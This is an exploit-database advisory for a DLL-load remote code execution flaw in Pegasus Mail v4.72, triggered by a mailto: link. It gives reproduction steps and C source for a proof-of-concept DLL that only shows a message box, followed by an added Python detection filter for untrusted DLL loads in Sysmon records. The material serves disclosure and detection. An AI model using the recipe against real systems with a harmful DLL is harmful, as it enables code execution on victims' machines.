Pegasus winpm-32.exe v4.72 Mailto: Link Remote Code Execution Vulnerability

ID 1337DAY-ID-27812
Type zdt
Reporter hyp3rlinx
Modified 2017-05-20T00:00:00


Exploit for windows platform in category remote exploits

[+] Credits: John Page AKA hyp3rlinx
[+] Website:
[+] Source:


Pegasus "winpm-32.exe"
v4.72 build 572

Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.

Vulnerability Type:
Remote Code Execution

CVE Reference:

Security Issue:
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:" link
if a DLL named "ssgp.dll" exists on the victim's Desktop. Tested successfully using the Internet Explorer web browser.


<a href="mailto:[email protected]">Link text</a>

Place "ssgp.dll" on the Desktop, then visit the webpage in Internet Explorer and click the mailto: link.
The arbitrary code is executed and Pegasus (pmail) is then launched.

The user needs to have set up PMAIL with the "mailto:" link option on install.

1) Set Pegasus as the default Email client for opening Emails, and set up PMAIL with the "mailto:" link option on install.

2) Compile "ssgp.dll" as a DLL using the 'C' code below.


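#include <windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

// PoC DllMain: shows a message box when the DLL is mapped into the process.
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
    break;
  }

  return 0;
}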

3) Place "ssgp.dll" on the Desktop.

4) Create an HTML file with the following in the web server root directory.
<a href="mailto:[email protected]">Pegasus Exploit POC</a>

5) Open the webpage in the Internet Explorer web browser and click the malicious mailto: link.

Our code gets executed...
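
For detection, the load described above shows up as winpm-32.exe mapping a DLL from a directory that is neither its own install directory nor a Windows system directory. The following is an added example, not part of the original advisory, that filters image-load records for that pattern. The records use Sysmon Event ID 7 field names (Image, ImageLoaded); the install path, user name, DLL names other than ssgp.dll, and the trusted-directory list are assumptions made for the example.

```python
import ntpath  # Windows path semantics, works on any OS

# Assumption: Windows installed on C:. Extend for other known-good locations.
TRUSTED_PREFIXES = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\windows\winsxs",
)

# Constructed sample records (Sysmon Event ID 7 field names, made-up paths).
SAMPLE_EVENTS = [
    {"Image": r"C:\PMAIL\Programs\winpm-32.exe",
     "ImageLoaded": r"C:\Windows\SysWOW64\kernel32.dll"},
    {"Image": r"C:\PMAIL\Programs\winpm-32.exe",
     "ImageLoaded": r"C:\PMAIL\Programs\example.dll"},
    {"Image": r"C:\PMAIL\Programs\winpm-32.exe",
     "ImageLoaded": r"C:\Users\alice\Desktop\ssgp.dll"},
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Users\alice\Desktop\other.dll"},
]


def _norm(path):
    """Collapse '..' segments and lower-case so comparisons are reliable."""
    return ntpath.normcase(ntpath.normpath(path))


def _under(directory, root):
    return directory == root or directory.startswith(root + "\\")


def find_untrusted_loads(events, process_name="winpm-32.exe"):
    """Return ImageLoaded paths the process mapped from outside its own
    install directory and the trusted system directories."""
    hits = []
    for ev in events:
        image = _norm(ev["Image"])
        if ntpath.basename(image) != process_name.lower():
            continue  # not the mail client
        dll_dir = ntpath.dirname(_norm(ev["ImageLoaded"]))
        app_dir = ntpath.dirname(image)
        trusted = _under(dll_dir, app_dir) or any(
            _under(dll_dir, p) for p in TRUSTED_PREFIXES)
        if not trusted:
            hits.append(ev["ImageLoaded"])
    return hits
```

Paths are normalised before comparison, so a load written as System32\..\Temp is judged by where it really resolves.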

# [2018-04-10]  #